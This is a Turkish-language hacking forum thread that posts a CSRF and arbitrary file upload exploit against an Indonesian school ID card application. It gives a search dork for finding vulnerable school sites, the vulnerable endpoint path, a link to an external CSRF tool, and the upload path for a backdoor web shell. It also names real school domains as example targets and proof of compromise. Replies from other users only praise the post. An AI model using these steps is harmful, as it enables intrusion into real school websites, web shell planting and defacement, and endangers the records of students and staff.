CSRF Güncel Exploit (1 Viewer)

[Morningstar]

Aplikasi Kartu Pelajar Vulnerability arbitrary file upload with CSRF

[+]Exploit title: CSRF(indonesian okulları)
[+]Author : Draven
[+]Dork : intext:Responsive image aplikasi kartu pelajar site:sch.id

[+] Exploit: kartu.localcrot.sch.id/user/aksi/ubah_pelajar.php

Eğer "Data Berhasil di Ubah" hatası verirse bu sitede upload izni vardır ve shell atma yetkimiz vardır.

[+] CSRF :

https://tools.xploitsecid.or(.)id/Exploit/CSRF

[!] Dosya Lokasyonu :

Dosyayı bu lokasyonu kullanarak yükleyeceksiniz;

kartu.localcrot.sch.id/img/your_backdoor.php

[!] Örnek : http://kartu.mit-alishlah.sch.id/user/aksi/ubah_pelajar.php
[!] Bunda deneyebilirsiniz :

Kartu Pelajar – Madaris Miftahul Huda

madarismiftahulhuda.com

[!] Kanıt : http://mit-alishlah.sch.id/mei.php

pwned?

man exploit internet

kartu.mit-alishlah.sch.id

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Morningstar]

Dipnot; index üstü index yemeniz muhtemeldir.

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[SHuTTeRLooK]

Eline sağlık dostum
Baya emek verilmiş bi konu
Tebrik ediyorum seni

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat

 

[Z3DX]

Eline emeğine sağlık

Bu içeriği görmek için giriş yapın.

Giriş yap TG Destek Chat